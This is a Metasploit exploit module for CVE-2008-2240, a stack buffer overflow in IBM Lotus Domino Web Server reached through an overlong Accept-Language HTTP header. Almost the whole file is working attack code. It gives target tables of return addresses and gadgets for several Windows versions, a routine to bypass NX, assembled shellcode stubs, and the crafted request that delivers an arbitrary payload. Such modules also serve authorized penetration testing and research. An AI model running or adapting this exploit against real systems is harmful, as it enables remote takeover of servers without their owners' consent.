IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
      'Description'		=> %q{
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
        prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
        request with an Accept-Language header greater than 114 bytes.
      },
      'Author'		=> [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],
      'License'		=> MSF_LICENSE,
      'References'		=>
        [
          ['CVE', '2008-2240'],
          ['OSVDB', '45415'],
          ['BID', '29310'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
        ],
      'DefaultOptions'	=>
        {
          'EXITFUNC'	=> 'thread',
        },
      'Privileged'		=> true,
      'Payload'		=>
        {
          'Space'			=> 800,
          'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
          'StackAdjustment'	=> -3500,
        },
      'Platform'		=>	'win',
      'Targets'		=>
        [

          ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
              'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
            }
          ],

          ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
              'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
            }
          ],

          ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
              'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
              'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
              'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
              'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
            }
          ],

        ],
      'DisclosureDate' => '2008-05-20'))
  end

  def exploit
    connect

    lang = rand_text_alphanumeric(116)				# greetz to hateful chris
    lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
    lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)
    lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
    lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1
    lang << "\x00"
    lang << payload.encoded

    if(not target['DisableNX'])
      lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
      lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2
      lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
    else
      lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
      lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2
      lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3
      lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4
      lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6
      lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top
      lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5
    end

    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger

    print_status("Trying target #{target.name}...")
    send_request_raw({
            'uri'			=> "#{uri}",
            'method'		=> 'GET',
            'headers'		=>
            {
              'Accept'		=> '*/*',
              'Accept-Language'	=> "#{lang}",
              'Accept-Encoding'	=> 'gzip,deflate',
              'Keep-Alive'		=> '300',
              'Connection'		=> 'keep-alive',
              'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
            }
          }, 5)
    handler
    disconnect
  end
end